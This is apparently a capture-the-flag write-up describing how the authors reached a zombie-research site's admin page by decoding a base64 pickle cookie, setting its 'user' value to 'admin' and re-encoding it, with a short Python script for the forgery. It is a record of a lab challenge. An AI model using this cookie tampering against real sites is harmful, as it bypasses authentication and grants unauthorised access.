This challenge required us to get access to the admin page of a research website about zombies.

We were presented with a page containing a button that links to the website’s /admin page. Clicking this button caused the server to redirect back to the homepage and send a cookie to the browser.

The cookie’s value was:
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu

Our first instinct was that this cookie was encoded in base64. After decoding it, we ended up with the following ascii:
(dp1\nS'python'\np2\nS'pickles'\np3\nsS'subtle'\np4\nS'hint'\np5\nsS'user'\np6\nNs.

This text is in the form of a Python pickle! By loading the string into a dictionary, we could manipulate the value to match the ‘user’ key. Re-encoding the pickle in base64, we managed to get access to the admin page and get our flag!

def decode(a): return pickle.loads(base64.b64decode(a))
def encode(a): return base64.b64encode(pickle.dumps(a))
a = decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")
a['user'] = 'admin'
print(encode(a))